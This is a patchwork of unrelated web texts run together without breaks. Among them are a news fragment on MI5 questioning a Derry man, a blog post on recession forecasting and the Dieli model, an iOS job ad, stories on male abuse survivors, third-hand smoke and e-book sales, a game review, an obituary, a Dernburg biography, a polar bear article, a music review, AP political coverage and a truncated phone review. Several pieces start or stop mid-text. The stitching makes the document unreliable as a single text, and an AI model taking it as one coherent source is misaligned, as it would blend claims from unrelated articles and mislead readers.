They also quizzed him about his thoughts on Sinn Fein and if he supported the vigilante group, Republican Action Against Drugs and they asked him about the North Derry Republican Group.
“They asked again if I would work for them and, if I did, it would all go away. I said ‘definitely not.”
The man said that, despite the arrests and raids on his home, he has not been charged with any crime.
“MI5 seem to know all about me. I don't come into Dungiven much, but MI5 know when I do,” he noted. “I can handle it, but what's not fair is when they target people who go about their daily business that I associate with. I don't like that. That annoys me a lot.”
When asked for comment, a spokesperson for the Home Office said they would not deny nor confirm either way.
Individual investors are constantly bombarded with misinformation from nearly all media sources on almost every issue, but rarely is there a more paralyzing rumor than the infamous “double-dip recession.” For this reason, it is crucial for people to invest some time into understanding the nuance behind recessions and recession forecasting before before they go and invest their money.
First things first, it is important to know that – apart from being a scary buzzword – the word recession actually has a precise definition. According to the National Bureau of Economic Research:
“A recession is a significant decline in economic activity spread across the economy, lasting more than a few months, normally visible in real GDP, real income, employment, industrial production, and wholesale-retail sales. A recession begins just after the economy reaches a peak of activity and ends as the economy reaches its trough. Between trough and peak, the economy is in an expansion. Expansion is the normal state of the economy; most recessions are brief and they have been rare in recent decades.”
Flashback to 2008.
Due to the lag time between the present day and the day when accurate economic data becomes available, recession calls are almost always delayed by a matter of months. I expanded on this idea in a post called How to Win a Recession-Predicting Contest. In setting up this “contest,” I decided to handicap different categories of forecasters based on their methods and qualifications.
The Perma-Bears. Readers can submit their nominations, but quite a number of forecasters have been on the recession theme for more than a year. They are disqualified, unless they specified a starting point. October-November predictors. These entrants might win, if the NBER conditions are met. These are the pundits who have said for months that “we are already in a recession.” A better formulation of their comments might be that these conditions, if sustained for a long enough period, will eventually be judged as a recession by the NBER. The Deniers. There are several respected pundits who do not believe that current experience will constitute a recession. These include Rich Karlgaard, Vince Farrell, Gary D. Smith, Dick Green, Mark Perry, and David Malpass. These observers, all of whom we respect, note that current data are not actually at the levels of past recessions. We note that the NBER might deem this a recession if the pullback from the peak is great enough, broad enough, and long enough. The Probability Analysts. Some of our most thoughtful and respected sources consider the data and make forecasts in a careful fashion. These forecasts weigh probabilities, mostly the question of whether the NBER criteria will be met. They ask the question of whether the current economic weakness will eventually prove to be long enough and broad enough to meet the definition. This group includes two of our favorite sources, including the ECRI (recently calling the recession) and Econbrowser (with an ongoing evaluation).
The winner of the contest was somewhat counterintuitive. I said it would be a “pundit from two polar opposite groups: one calling the start in October or November or one predicting that no recession will occur. The reason? If this time period is ultimately deemed to be a recession, the dating will go back to the last peak. Those are the rules.”
The 2012 Series
At the beginning of 2012, I wrote a mini-series here on A Dash of Insight on how to evaluate recession forecasts and why it's important to do so. In my post, “Why the Individual Investor is Bamboozled by Recession Forecasts,” I continued to outline some of the basic steps everyone should take when thinking critically about research. Before jumping to any conclusions, ensure the researcher has:
Provided a hypothesis, stated in advance; Explained the reason for the proposed statistical interaction; Demonstrated a real-time record of recession forecasting; and Maintained the same exact criteria over time (no fudging, changing, suggesting of Plan B or exceptions).
Later in the series I continued to offer advice on practical ways to review the pundits.In a post titled Evaluating Recession Forecasting: What Every Investor Must Know, I warned readers about the prevalence of factually correct but deceptive claims in financial news and blogs.
Many pundits, including some of the most famous and powerful, are playing fast and loose with the “R” word. John Hussman, a leader in keeping investors scared witless (TM OldProf eumphemism), now warns us that everyone else is looking at lagging or coincident indicators, and that we might all be blindsided by a recession. Here is a key argument: Let's examine the seemingly most “compelling” data point first – the fact that December payrolls grew by 200,000. Surely that sort of jobs number is inconsistent with an oncoming recession. Isn't it? Well, examining the past 10 U.S. recessions, it turns out that payroll employment growth was positive in 8 of those 10 recessions in the very month that the recession began. Let's keep that one in mind for a moment while we consider another popular allegation. It goes like this: Mr. X (substitute nearly any mainstream analyst) thought that the economy was fine in December of 2007, the very month the recession was starting. These statements are accurate, but deceptive. Understanding why is crucial to an objective analysis of recession forecasting.
Based on the technical definitions set by the NBER as well as the lagging nature of accurate economic data, it should be clear exactly why this is the case.
In that same post, I went over my “acid test” for forecasting methodologies.
Openness — with the potential for peer review
Small number of input variables. Most people do not understand that “small is good.” If you have a lot of variables, it is easy to do back-fitting on a few cases. Beware.
Real-time performance. This means that you do not go back in history doing any data-mining. You create an indicator and live with it through time. (While the ECRI predictions are a matter of record, no one knows what changes they have made in their indicators).
After applying my own academic rigor to the plethora of recession forecasters in the financial blogosphere, I came to a definite conclusion on who is the best recession forecaster:
Robert F. Dieli and Mr. Model Most people think they know about recession forecasting, but they are often responding to someone's last good call or who has the best PR team. The Dieli method hits a winning trifecta — it is based on sound intellectual premises, it has worked better than any other method in real time, and it is open for our review.
I go on to interview Robert Dieli in that post (link), which is certainly worth a readthrough in full. A few highlights:
Q: How much lead time do you usually see between a signal from Mr. Model and an economic peak or trough? The Aggregate Spread, which is the principal forecast statistic, operates with a constant nine month forward look. Unlike other leading indicators which operate with a variable lead time, the Aggregate Spreads look ahead nine months at all times. Think of it in the same terms as the beam on the radar on your local weather channel. The historical record has shown that when the Aggregate Spread gets to 200 Basis Points, from either direction, we have reason to think there will be a cycle event (either a peak or a trough) some time in the time period nine months ahead of the arrival of the Aggregate Spread at the 200 Basis Point boundary. Q: Making those calls out nine months must lead to some interesting conversations with your clients. Indeed they do. For example, the signal for the peak of the 2001 recession that began in March of that year, came from model readings obtained in June of 2000. Telling folks, in the middle of the tech boom, that the business cycle had not been repealed and that we would have a recession the following year was a tough sell. Similarly, the indications that the recession of 2007 would end in the middle of 2009 began to emerge late in 2008 and in early 2009. Trying to tell folks that the economy would turn up while it was in the midst of what looked like a free fall in the first quarter of 2009 was even more difficult. But, because the model has the track record that it does, by the end of the first quarter of 2009 most of my readers were convinced that the worst of the recession was over and that a bottom would be forming. Q: To make this clear, while you talk about markets, you are not making market predictions. You are predicting the economy, right? That is correct. What I am out to do is anticipate the dates of business cycle turning points as determined by the National Bureau of Economic Research (NBER) with enough warning to allow effective planning. The stock market, the fixed-income market, and the housing market, to name just three, all have their own cycles. Sometimes those cycles match up closely with the NBER turning points, and other times they don't. But you can't know that until you know the NBER dates. The Aggregate Spread has an excellent record of showing, as much as a year ahead, when an NBER event is likely to take place. Armed with that information, and the specifics of their industry, or market, informed decision makers can make appropriate plans.
Moving forward, the one of the best resources I can recommend for investors concerned about upcoming recessions is Doug Short's ongoing work. Not only has he chronicled the ECRI recession call, but also the continuing comments from critics. As usual, Doug provides a great package of charts to illustrate the key points.
While this will undoubtedly be an ongoing theme in financial news for the forseeable future, these tools should help you, the individual investor, to think straight and keep a level head when others buy in to the hysteria.
Linking to the Business Cycle
In this article, Drawing the Wrong Inferences from Economic Data, I explain how investors can profit from better understanding of recessions.
In general discussion and most media presentations, a recession is just a period of economic weakness. Most people think that we never emerged from the recession that started in 2007.
If you put aside the “R” word and instead think about the business cycle, it helps to see which investments are best at any given time.
On September 7, 2012, I analyzed current stock prices in the context of the fundamentals behind the economy. While many make the argument that the market is currently overvalued, I found that these claims were totally unfounded.
“May of 2008. Forward earnings on the S&P 500 then were 93.77, the ten-year yield was 3.9% and the odds of a recession — according to the best method — were nearly 100%
Now. Forward earnings are 108, the ten-year yield is 1.59% and the recession odds for the next year are below 10%.
People talk about headlines and sling around phrases like Draghi put, printing money, etc., instead of analyzing data. The world is a much better place for investing than it was in 2008…
All of the metrics are better now than they were at the prior market top. This is why stock prices increase over time — the fundamentals, defined correctly, get better.”
Refelecting on the 1987 market crash, I took some time to write about ways in which both this crash and the 2008 crash may have changed the mentality of investors for years to come.
“This most important lesson of the 1987 crash is not commonly understood. For the next few years, any stock system, whether based on fundamentals, technicals, or a computer program, had an acid test:
Did it call the crash?
We saw dozens of pitches. No one even bothered with a method that did not include a successful ‘crash call.' The event was so important, and had such a great impact on results, that you could not make a persuasive case for a system that did not have a ‘tweak' that would have predicted the crash.
Similarly, analysts who had given warnings were celebrated as heroes. This turned out to be fifteen minutes of fame for some.
This final lesson is probably the most important, and the most difficult to understand. Excessive emphasis on the ‘crash call' warped the thinking of portfolio managers and individual investors alike. The life-changing events from 25 years ago punished some of the smartest traders and rewarded some of the, ahem, least skilled who happened to have the right position for the wrong reason.
Those who took the wrong lessons from this got to double down in lost opportunity. They followed the wrong gurus and the wrong systems for many years thereafter. They never recovered.
2008 is an echo of 1987. Another generation of investors may be lost.”
In early November of 2012, I took it upon myself to debunk the rumors surrounding a chart which allegedly showed definitive proof that a double dip recession would occur.
Rather than simply basing an abject conclusion off of the chart, I recommended bloggers actually take some time to read the research behind it.
“If you actually read the cited paper you would see the following points: The authors were trying to improve slightly on the NBER recession dating process — getting closer to real time. The authors recommended waiting until a reading of 80% was reached for three consecutive months to avoid excessive false positives. (P. 9 of the paper). At a minimum, if you are going to use your bully pulpit on the Internet to scare the daylights out of people, wouldn't it be a good idea to confirm with the authors first? This is the downside of a world where no confirmation is required before publishing.”
It is worth noting that after contacting the authors of the paper from which this chart originated, both of them emailed me to confirm that my interpretation was correct – and the 100% chance of recession interpretation was completely baseless.
For further reading, visitors may be interested in checking out the yearly summaries of our Silver Bullet awards from 2013 and 2014. There are logical fallacies of many types in these posts, but you'll find they disproportionately tend to involve some sort of imminent market crash.
The Role
We're looking for a product-oriented engineer that can bring compelling user experiences to life on iOS devices (our business users focus on iOS predominately). We're looking for someone who is not only well versed in iOS development, but also has a strong understanding of good UX and is excited to learn about and contribute to app performance.
Responsibilities
You'll have responsibility over the mobile codebase and how to ensure users are happy with our mobile UX. This will include prototyping new functionality, choosing which tools we use, testing, iterating, and basically taking ownership from end to end. iOS will communicate to our API layer, so you'll be collaborating with the rest of the engineering team on how to interact with various services.
Desired skills (we like people with skills)
Competent in various languages to get the job done, whether that are Swift, React Native, etc
A firm grasp of the iOS development libraries and UI controls/guidelines
Full understanding of iOS application submission process, and can navigate certification/provisioning/configuration processes
Past track record of production ready apps in the app store
Understanding of RESTful API's and how to interact with them in iOS
APNS experience
* While the focus of this role is iOS development, you will be given many opportunities to work on many non-iOS engineering projects **
Also contact us if...
Two men who survived sexual abuse when they were teenagers are urging other victims to break their silence.
They unveiled a new billboard in Timmins this week to raise awareness about the issue of male sexual abuse. The sign advertises an Ontario hotline that victims can call to get help.
One of the men behind the billboard is Ray Auclair, who's urging survivors to come forward and seek treatment.
“You know what, you feel so much better after,” he said.
“I get teared up all the time … you feel so much better because finally somebody believes you and somebody's helping you, you know."
Auclair says he hopes to get billboards put up across the northeast.
It took Chelmsford resident Ray Lariviere forty years to build up the courage to tell his own story.
Lariviere said he was sexually abused by his chruch deacon in the 1960s.
The aftermath of this experience cost him his first marriage, and gave him suicidal thoughts, he said.
Now, he wants to prevent other victims from going down the same path.
"Sexual abuse is going on,” he said. “We want the people not to be afraid to come forward."
After breaking his silence, Lariviere joined a male survivor group in Timmins, where he met Auclair.
Auclair had the idea for the billboard with a 24-hour hotline.
"I think I would've called that number, if I was a kid, because it bothered me really bad,” Auclair said.
Last year, the Sudbury Counselling Centre started promoting services for male survivors of sexual abuse.
Program director Francine Boudreau said it's been successful.
“We've certainly had more men calling us to receive services,” he said.
Lariviere said he hopes to put up more billboards across the northeast.
DALLAS, March 16, 2014 — Leftover cigarette smoke that clings to walls and furniture is a smelly nuisance, but now research suggests that it could pose a far more serious threat, especially to young children who put toys and other smoke-affected items into their mouths. Scientists reported today that one compound from this "third-hand smoke," which forms when second-hand smoke reacts with indoor air, damages DNA and sticks to it in a way that could potentially cause cancer.
Their talk was one of more than 10,000 presentations at the 247th National Meeting & Exposition of the American Chemical Society (ACS), the world's largest scientific society, taking place here through Thursday.
Bo Hang, Ph.D., who presented the research, said that although the idea of third-hand smoke made its debut in research circles just a few years ago in 2009, evidence already strongly suggests it could threaten human health.
"The best argument for instituting a ban on smoking indoors is actually third-hand smoke," said Hang, a scientist at Lawrence Berkeley National Laboratory (LBNL).
Researchers have found that many of the more than 4,000 compounds in second-hand smoke, which wafts through the air as a cigarette is smoked, can linger indoors long after a cigarette is stubbed out. Based on studies led by Hugo Destaillats, Ph.D., also at LBNL, these substances can go on to react with indoor pollutants such as ozone and nitrous acid, creating brand-new compounds, some of which may be carcinogenic.
One of those compounds goes by the acronym NNA. Hang's research has shown that NNA, a tobacco-specific nitrosamine, locks onto DNA to form a bulky adduct (a piece of DNA bound to a cancer-causing chemical), as well as other adducts, in lab test tubes. Other large compounds that attach to DNA tend to cause genetic mutations. NNA also breaks the DNA about as often as a related compound called NNK, which is a well-studied byproduct of nicotine and a known potent carcinogen. This kind of DNA damage can lead to uncontrolled cell growth and the formation of cancerous tumors.
Just as it took years to establish the cancer-causing effects of first-hand smoke that is inhaled as a person breathes in directly from the cigarette, making the connection between third-hand smoke or NNA and cancer could take a long time, Hang said. But early research into its nature, exposure and health effects is compelling enough that a research consortium dedicated to investigating third-hand smoke was formed in California in 2010. That consortium helped fund Hang's work on NNA-induced DNA damage, which he said could eventually be used as biomarkers to identify people who have been exposed to third-hand smoke.
The biggest potential health risk is for babies and toddlers, he noted. As they crawl and put their hands or toys in their mouths, they could touch, swallow or inhale compounds from third-hand smoke. Their small size and early developmental stage make them more vulnerable than adults to the effects of environmental hazards.
Although many public places prohibit smoking, Hang noted that people can still smoke in most rental apartments and private residences — and smoking remains a huge public health issue. In 2011, nearly 44 million American adults reported smoking cigarettes, which ranks as the leading cause of preventable death in this country. And 34 million people smoke every day, according to data from the Centers for Disease Control & Prevention.
So far, the best way to get rid of third-hand smoke is by removing affected items, such as sofas and carpeting, as well as sealing and repainting walls, and sometimes even replacing contaminated wallboard, he explained. Replacing furniture can be pricey, but Hang said vacuuming and washing clothes, curtains and bedding can also help.
Source: Major 'third-hand smoke' compound causes DNA damage -- and potentially cancer
Print is not dead. Actually, it's e-books that are having a rough time right now. The Association of American Publishers says e-book sales slumped about 10 percent in the first five months of 2015.
This could be a sign that more people are returning to books with binding, or that more people are hybrid readers, as The New York Times suggests. Do people just prefer reading on paper? The Times points out that sales of dedicated e-reading devices have also taken a hit, but that's not too surprising considering how popular tablets and smartphones are — both of which can also fulfill the e-reader role.
Advertisement
Print publishers don't seem to be treating the drops as a short-lived trend, because big names are already pouring a lot of money into the “old school” medium, though with some changes. The Times reports Hachette, Simon & Schuster and even Penguin Random House all invested in making warehouses or distribution centers larger. Penguin's also been offering faster turnaround times for sellers orders. And HarperCollins is paying close attention to data to get books shipped faster too.
Even independent booksellers seem to be investing again. The American Booksellers Association counted a higher number of member stores and locations in comparison to five years ago: (2015) 1,712 stores in 2,227 locations versus (2010) 1,410 stores in 1,660 locations.
This is turning into a pretty impressive turnaround. If only newspapers could ride on the coattail of some of this paper love.
Advertisement
[The New York Times, Ian Muttoo / CC BY-SA 2.0]
Pony Island isn't about ponies. Do not be put off by the title. This bargain bin-priced PC game has nothing at all in common to any one of the million horse riding/stable simulators on the market. Pony Island is a smart and devious game that sucks you into its bizarre and somewhat evil world by tricking you into believing you're interacting with an AI - and a smart one at that.
Part puzzle game, part retro experience, part mindfuck, I haven't played anything as engaging and interesting as Pony Island in a long time. Play it without much prior knowledge and it's a stream of cool moments that will no doubt make some people (idiots) stare in awe, or at least give an acknowledging nod, to say, 'well done game, well done.'
Imagine going to the cinema to watch Alvin and the Chipmunks but in fact getting a screening of that film spliced with Misery. If that sounds like something you'd enjoy, what are you waiting for?
That's all I'm going to say about Pony Island. It's £3.99 on Steam and it'll run on just about any PC or Mac, so there's almost no excuse not to give it a go.
'Happy Days' Star Al Molinaro Dies
'Happy Days' Star Al Molinaro Dies
Exclusive Details
Al Molinaro, who played the beloved chef at the drive-in on "Happy Days" ... died in a California hospital on Friday.
Molinaro's son confirmed the actor's death ... telling us he had very bad gall stones, but Al elected not to have surgery due to his age. He was 96.
On "Happy Days" he played Big Al Delvecchio, who started out as the chef at Arnold's Drive-In. He eventually became owner of the Fonz's fave hangout, and remained on the show for 10 years.
Molinaro also played the Big Al role on the spinoff, "Joanie Loves Chachi." His character would famously spin long tales that always started with, "Yep, yep, yep, yep, yep."
In the mid '90s Weezer put him in their "Buddy Holly" music video.
Al is survived by his wife, Betty and his son Michael .. who tells us the actor was extremely proud of his family and his roots in Kenosha, Wisconsin.
German politician
Bernhard Dernburg (July 1931)
Bernhard Dernburg (17 July 1865 – 14 October 1937) was a German liberal politician and banker. He served as Secretary for Colonial Affairs and head of the Imperial Colonial Office from May 1907 to 9 June 1910, and as Federal Minister of Finance and Vice Chancellor of Germany from 17 April to 20 June 1919.
Background and banking career [ edit ]
Born in Darmstadt in the Grand Duchy of Hesse, Bernhard Dernburg was the son of publisher and politician Friedrich Dernburg (1833–1911), a member of the National Liberal Party, belonging to a distinguished Jewish family. Friedrich Dernburg had converted to Lutheranism and married Luise Stahl, the daughter of a Lutheran minister. Bernhard Dernburg was a Lutheran. He made a career in banking, including at the Deutsche Bank, and became Director of Deutsche Treuhand-Gesellschaft in 1889. He subsequently joined the management of the Darmstädter Bank für Handel und Industrie. In 1901, he founded the Deutsch-Luxemburgische Bergwerks- und Hütten-AG together with Hugo Stinnes, which became one of the largest companies in its field. He served as a board member of a number of large industrial companies.
Political career [ edit ]
In 1906, Dernburg entered politics as Prussian Representative at the Federal Council. In 1907, he was appointed Secretary of State for Colonial Affairs and head of the Imperial Colonial Office. As Secretary, he pursued a reformist course in German colonial policy.
Dernburg resigned from this post in 1910. During 1914 and 1915, while Germany was at war with Britain but the USA was still neutral, Dernburg was based in the United States and represented German viewpoints in the propaganda campaign against Britain.[1]
Following the First World War, he co-founded the liberal German Democratic Party, served as a member of its national board, and was elected to the Weimar National Assembly. From 17 April to 20 June 1919, he served in the cabinet of Philipp Scheidemann as Federal Minister of Finance and Vice Chancellor.
He was a member of the Reichstag, representing the German Democratic Party, from 1920 to 1930. He died in Berlin on 14 October 1937.[2]
Publications [ edit ]
Koloniale Finanzprobleme , 1907
, 1907 Koloniale Lehrjahre , 1907
, 1907 Südwestafrikanische Eindrücke , 1909
, 1909 Industrielle Fortschritte in den Kolonien, 1909
References [ edit ]
^ Historical Dictionary of European Imperialism, edited by James Stuart Olson, Robert Shadle, 1991, pg 170 ^ Historical Dictionary of European Imperialism, edited by James Stuart Olson, Robert Shadle, 1991, pg 170
Further reading [ edit ]
Schiefel, Werner (1974). Bernhard Dernburg 1865–1937. Kolonialpolitiker und Bankier im wilhelminischen Deutschland (in German). Zürich: Atlantis-Verlag. ISBN 3761104456.
Bartmuss, Hartmut (2014). Bernhard Dernburg: Kolonialpolitiker der Kaiserzeit (in German). Berlin: Hentrich und Hentrich Verlag Berlin. ISBN 3955650340.
My work is greatly influenced by my background in mechanical engineering. I enjoy giving a “front seat” to the more minor aspects of these automobile parts, making sure every ounce of potential is squeezed from each one. So many resources are invested in creating these parts – I'm convinced that they can be reused, instead of constantly finding new raw material to work with.
The way I see it, every scar, every deformation, only adds to the worldliness and wisdom that I try to infuse into each piece of furniture – the final product. I buy the raw materials at different junkyards, where already as I “meet” the piece for the first time, I can picture what the rusty, beat-up piece wants to become.
From there, the road to the final, unique product is a long one, sometimes taking months. Most of the effort is spent preserving elements from the part's “previous life” – indentations, trademarks symbols and so on.
It is important to me that I put true, high-quality workmanship into the pieces I create and produce high end, functional pieces, with a sometimes comical twist.
Creating each piece sees the fascinating and exciting use of a myriad of techniques, including (but not limited to): cutting, welding, flattening, panel beating, gluing, drilling, lining, painting and protecting.
Through this process, I hope to give these parts a new lease on a long and respectable life.
This video shot in Manitoba, Canada shows a close encounter between a polar bear and a dog. The polar bear appears to gently pet the dog. (Youtube/David de Meulles)
A video of an enormous polar bear in Canada gingerly patting a chained sled dog hit the Internet last week and quickly went viral. The Huffington Post lauded its “cuteness factor.” The man who shot the video praised the bear for showing “that kind of heart toward another animal.”
But reality soon intervened. Canada's CBC News reported that officials had removed three polar bears from the same property in Churchill after one killed and ate another dog. The owner of the site, who raises the sled dogs, told the network that the slaughter had occurred on “the only day we didn't feed the f—— bears, the only night we didn't put anything out.”
The irony of the two incidents spawned commentary on the perils of the attributing human emotions to animals and imposing a moral code the creatures can't possibly be expected to live up to. They also renewed anger at the owner of the site, Brian Ladoon, who has long been a target of animal rights activists and conservationists who decry his chaining of dogs and luring of polar bears for tourist photo-ops.
[Love in the time of climate change: Grizzlies and polar bears are now mating]
Tom Smith views it all from somewhere in between. Smith is a wildlife biologist and advisory scientist with Polar Bears International, and he has spent his career studying bears of all sorts — polar, grizzly and black. He chuckled when he viewed the “petting” video this week, which he didn't exactly see as petting.
Bears have a sky-high “curiosity quotient” and tend to ask questions with their teeth and paws, which is why they sometimes tear up human campsites, he said. But he added that this is also a time of year when polar bears, which depend on sea ice for hunting seals, have essentially been starving for months.
“To me, it's like it's trying to see if the food's ready or not,” Smith said, laughing. “It's not surprising that it would try to explore this dog . . . but I guarantee if you left that bear there long enough, it would say, ‘I wonder what this dog tastes like?' I'd be sorely disappointed in a bear that didn't ultimately eat that dog.”
It has been a long, warm summer, and polar bears are ready for sea ice to return so they can hunt. Here, a polar bear tests the strength of thin ice in the Arctic. (Mario Hoppmann/Agence France-Presse via Getty Images)
To be clear, there is no indication that the bear in the video is the one that ate a dog, or that the dog in the video is the dog that was eaten. A Manitoba Sustainable Development spokesperson told CBC that authorities had removed the bear that killed a dog from Ladoon's Mile 5 Dog Sanctuary, as well as a mother and a cub, “because there were allegations the bears were being fed and the females' behaviour was becoming a concern.”
[Here's what seeing bears at National Parks looked like 90 years ago]
Which means that, yes, the bear and the dog in the video probably did peacefully coexist for at least a few moments — the kind of interaction that has been captured previously at the same site. And Smith said that doesn't surprise him, either. That's because bears are highly trainable and extremely motivated by food.
A little background: Ladoon is a painter who has taken it upon himself to save the Canadian Eskimo dog, a rare breed. He does this at Mile 5, a windswept and barren point on the Hudson Bay. According to many reports, some of the dogs are allowed to roam and “guard,” while most are chained. Polar bears also show up, lured either by the smell of dog food or by food Ladoon puts out for them (he has previously both denied and acknowledged feeding the bears, which is illegal). Ladoon charges tourists to come see and photograph the polar bears, which have fiercely battled and killed dogs there in the past.
Churchill, Manitoba, is a small community known as “the polar bear capital of the world,” where tourists gather every fall to observe the bears and their cubs. (Smithsonian Channel)
Ladoon has also said he keeps the polar bears in line. He told author Jake MacDonald that he'd “give them a little bird shot in the rear end if they needed it.” He told journalist Jon Mooallem, who wrote about Ladoon in his book “Wild Ones,” that he has trained them to back up at the sound of him pumping the action on his shotgun.
That's important, said Smith, who has spent lots of time in Churchill and has met Ladoon. We've all seen images of captive bears riding bicycles or walking upright. They typically do this because people are offering a bear food or threatening punishment. Polar bears with grumbling tummies would be similar, Smith said. They'd learn the rules, which in this case would be: Don't hurt the dog if you want to stick around and get food.
[DNA evidence helps free a service dog from death row]
“Bears don't get old doing stupid stuff. So when you've got a human standing there with a gun, they learn very fast where the lines are,” Smith said. “So it's not exactly a rare glimpse into a bear-dog alliance or something. That's what people would like, but it's just not the way the world works. Again, a very behaviorally plastic animal under great food stress, they can do a lot of tricks.”
But that doesn't necessarily mean that polar bears see the world purely through meat-colored lenses. Smith referred to them as animals that aren't social by nature but also aren't antisocial. He said he has seen them “lounge around and play pat-a-cake” — with one another. He also has published a paper on flexible relationships between wolves and brown bears, which he has seen share fish.
“Can they be congenial without humans intervening? They can,” he said of bears. “I'm not trying to take away from the joy people find in the wonderful range of behaviors bears can exhibit.”
But, he said, the polar bear petting video “is a little different.” It and its dog-eating peer are hungry bears. They're visitors to a place where food is present, and so are people who might harm them.
“It doesn't take away from the fact that bears can do that. But you always have to ask: Why would it do that?” he said. In this case, Smith said he believes, “the reason it's acting that way seems to be mediated by human intervention.”
Read more:
How our political vitriol harms dogs
Two moose locked antlers in a fight, then froze together in a stream
You go, girl! A female panther crossed a Florida river — and that may help save her species
“Jacaranda” [ft. Dubbel Dutch]
Trap, dancehall, “future reggaeton”—these are the sounds of Spain's *other *electronic-music movement, the one you won't find represented in glossy Ibiza superclubs or techno-tourist hotspots. And at the forefront of the movement is Bad Gyal, a 20-year-old singer with a no-fucks-given attitude wrapped in silky Auto-Tune. (“Sólo quiero el money/Dónde está el cash, there you find me,” she coos on 2016's bewitchingly hypnotic “Mercadona.”) Bad Gyal first broke through a year ago with “Pai,” a Catalan-language remake of Rihanna's Caribbean-flavored “Work,” and her new single, “Jacaranda,” makes an even more explicit link to dancehall: Its producer is Dubbel Dutch, a Los Angeles beatmaker with a passel of credits for Popcaan.
Bad Gyal's best work so far has been distinguished by its eerie, translucent gleam, and on “Jacaranda,” Dubbel Dutch dials up the blacklight until his staccato synths seem to pop with vivid, fluorescent color. The trim drum programming splits the difference between dem bow's loping cadence and trap's precision-machined snap, but the tune is mostly held together by empty space and the sounds that sail through it—like a strange, distant cry that goes streaking across the speakers every few bars, sounding for all the world like a wailing baby in the next apartment. But it's a Bad Gyal's armor-smooth, Auto-Tuned croon that keeps you transfixed. This time, she opts for Spanish mixed with English, purring to her partner on the dancefloor: “So papi come closer to me tonight/Que yo tengo culo pa' rebotar”—or something along the lines of, “I've got an ass to bounce.” At its heart, “Jacaranda” is a love song, though the real object of her affections might just be reggae itself. “I'm not in Jamaica,” she admits, “But let the world boom from the dancehall.”
WASHINGTON (AP) — Steve Bannon is telling people he's not coming after mainstream Republicans in the House the way he's targeting senators with anti-establishment disrupters in primaries. Many in the House are looking over their shoulders all the same.
“I can't read Mr. Bannon's mind,” said North Carolina Rep. Robert Pittenger, who could well be on the list.
Back atop the right-wing media organization Breitbart News, President Donald Trump's ousted strategist is openly trying to topple Senate Majority Leader Mitch McConnell and incumbents backing the Kentucky Republican. Bannon and his supporters say McConnell is the embodiment of an insufficiently conservative, unproductive party establishment.
The House is a different story, so far.
The 435-representative chamber is far larger than the 100-member Senate, so it would take huge sums for Bannon to reshape. It's also where Speaker Paul Ryan, R-Wis., has steered bills erasing much of the Obama health law and cutting taxes. Conservatives such as Bannon may be able to tilt the House rightward simply by running primary candidates in open seats, rather than battling normally well-funded Republican incumbents.
When Bannon met this month with Rep. Steve Stivers, R-Ohio, who heads the House GOP's campaign organization, he told Stivers their goals are aligned.
They're “largely on the same page to defend and expand” the party's majority, though there “might be a race here or there” where they clash, said Andrew Surabian, a Bannon associate and adviser to the Great America Alliance, a pro-Trump political organization.
“Steve's focus is not on incumbents in the House,” Surabian said. “If you're not going out of your way to be a thorn in the side of the president, you probably don't have much to worry about.”
House Republicans aren't completely convinced, and potential primary challengers are feeling buoyed.
“There are qualities about my candidacy he certainly would like,” Mark Harris, a former pastor set for a rematch with Pittenger in a district east of Charlotte, said of Bannon. “We've got to start draining the swamp.”
Harris lost in 2016 by fewer than 200 votes. He says he hasn't talked to Bannon “as of yet.”
In New York, GOP Rep. Dan Donovan got a shot across the bow: a “Game on!” tweet by Michael Grimm, his challenger in next year's primary, that included a photo of a smiling Grimm with Bannon. Grimm held Donovan's Staten Island seat before serving seven months in prison for tax evasion.
House moderates, who've started calling themselves “governing conservatives,” seem particularly unsettled by Bannon's crusade and anti-incumbent efforts by other conservatives groups.
“We want one unified Republican Party,” said Sarah Chamberlain, president of the Republican Main Street Partnership, which supports more than 70 GOP moderates. “If the fight comes, we'll be prepared.”
The Senate has 33 seats at stake next November, including eight held by Republicans. It's also the realm of McConnell.
“It's Mitch McConnell's desk where the Trump agenda goes to die,” Surabian said.
Bannon's ability to influence the House is more questionable. It would take tens of millions of dollars to sway the several dozen competitive races expected next year.
Beyond the House's sheer size, many moderate Republicans who might be tempting Bannon targets represent suburbs where hard-right conservatives could well lose the general election. That could increase the risk of Republicans forfeiting House control — bad news for Trump's agenda and his prospects of avoiding congressional investigations.
“You lose control of the House and you have a misery index,” former Rep. Tom Reynolds, a New York Republican who headed House GOP campaign operations, said of the consequences to Trump should Democrats take over.
Bannon would likeliest engage in open House seats in GOP strongholds in Texas, Pennsylvania and elsewhere, or the dozen Democratic-held districts, mostly in the Midwest and Northeast, that Trump carried last year. Surabian said the idea is to elect “more allies to Mark Meadows,” the North Carolina Republican who leads the hard-right House Freedom Caucus that has battled party leaders.
Bannon supporters say his backing brings activist conservatives and fundraising. Mainstream Republicans say his potency is overrated, noting that conservative groups such as the Club for Growth have targeted Republican centrists with limited success.
“There isn't any evidence to this point that outside of his news organization, Mr. Bannon has the resources for campaigns of this magnitude,” said Brian J. Walsh, a GOP strategist.
Said Rep. Bradley Byrne, R-Ala.: “If you go into Walmart and say, ‘Hey, do you know who Steve Bannon is?' they go, ‘Huh?'”
Another test of Bannon's influence: Roy Moore, the Republican Senate candidate in Alabama. Six women have accused Moore of pursuing romantic relationships with them when they were teenagers and he was an assistant district attorney in his 30s. Two have accused him of assault or molestation, accusations that he has vehemently denied.
Bannon helped Moore wrest the GOP nomination from incumbent Sen. Luther Strange in September, before the allegations emerged. The seat was once considered a Republican lock, so a victory by Democrat Doug Jones could hurt Bannon's influence.
Democrats decisively won governors' races in Virginia and New Jersey this month and gained local posts nationwide. They would capture House control by gaining 24 seats in next year's midterm elections, which are historically tough for the party holding the White House.
Ominously, 24 House Republicans and just seven Democrats have announced so far they're not seeking re-election.
As for incumbents Pittenger and Donovan, each stresses his loyalty to Trump.
Pittenger says he's backed Trump on nearly all House votes. While Harris has pledged fidelity to conservative groups, Pittenger says, “I pledge allegiance to my constituents.”
Donovan, among just 20 House Republicans who opposed the House bill repealing the Affordable Care Act, says he's known Trump for two decades.
Trump “understands the differences between New York and the rest of the country,” Donovan says.
There have been plenty of iPhone diehards who have tried making the switch to Android over the years, and while some of them liked what they've seen, others haven't been able to last even a single day. UI design expert Hillel Cooperman, a former Microsoft user experience expert and cofounder of user experience design consulting firm Jackson Fish Market, falls squarely into the latter category. Cooperman recently decided to put down his iPhone and pick up an HTC One just so he could get an understanding of Android's user interface and he seemed to dislike everything about both HTC's flagship phone and Google's mobile platform.
So what did Cooperman find was so awful about the HTC One, which we found to be one of the best smartphones released last year? Take your pick.
From earlier: Apple fanboy explains why he couldn't stand using the Nexus 5 for more than 24 hours
